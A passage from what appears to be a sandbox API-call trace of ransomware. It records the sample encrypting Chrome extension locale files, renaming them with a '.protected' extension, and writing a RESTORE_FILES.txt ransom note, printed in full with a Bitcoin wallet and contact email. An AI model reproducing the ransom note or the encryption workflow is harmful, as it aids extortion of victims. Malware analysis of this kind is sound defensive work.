(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.927] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.927] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.927] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.927] CloseHandle (hObject=0x164) returned 1 [0078.927] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Windows") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Program Files") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="Program Files (x86)") returned -1 [0078.927] lstrcmpiW (lpString1="da", lpString2="$Recycle.bin") returned 1 [0078.927] lstrcmpiW (lpString1="da", lpString2="System Volume Information") returned -1 [0078.927] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da") returned 141 [0078.927] lstrcmpW (lpString1="da", lpString2=".") returned 1 [0078.927] lstrcmpW (lpString1="da", lpString2="..") returned 1 [0078.927] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*") returned 143 [0078.927] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.928] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.928] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\.") returned 143 [0078.928] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.928] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\..") returned 144 [0078.928] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.928] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.928] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.928] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.928] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.928] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.928] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.928] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.928] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.928] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.929] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json") returned 155 [0078.929] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.929] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.930] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff28, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd8, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd8, lpOverlapped=0x0) returned 1 [0078.930] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.930] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.930] CloseHandle (hObject=0x168) returned 1 [0078.930] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected") returned 165 [0078.930] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\messages.json.protected")) returned 1 [0078.931] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.931] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.931] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\RESTORE_FILES.txt") returned 159 [0078.931] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\da\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.931] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.931] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.932] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0078.932] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0078.932] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0078.932] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0078.932] CloseHandle (hObject=0x164) returned 1 [0078.932] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Windows") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Program Files") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="Program Files (x86)") returned -1 [0078.932] lstrcmpiW (lpString1="de", lpString2="$Recycle.bin") returned 1 [0078.932] lstrcmpiW (lpString1="de", lpString2="System Volume Information") returned -1 [0078.932] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de") returned 141 [0078.932] lstrcmpW (lpString1="de", lpString2=".") returned 1 [0078.932] lstrcmpW (lpString1="de", lpString2="..") returned 1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*") returned 143 [0078.933] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0078.933] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\.") returned 143 [0078.933] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0078.933] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\..") returned 144 [0078.933] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0078.933] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0078.933] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0078.933] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0078.933] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.933] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0078.933] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0078.933] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0078.933] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0078.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0078.935] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json") returned 155 [0078.935] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0078.935] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.935] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff27, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0078.935] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xd9, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xd9, lpOverlapped=0x0) returned 1 [0078.936] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0078.936] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0078.936] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0078.936] CloseHandle (hObject=0x168) returned 1 [0078.936] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected") returned 165 [0078.936] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\messages.json.protected")) returned 1 [0078.938] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0078.938] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0078.938] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\RESTORE_FILES.txt") returned 159 [0078.938] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\de\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0078.938] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0078.938] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0078.939] lstrlenA 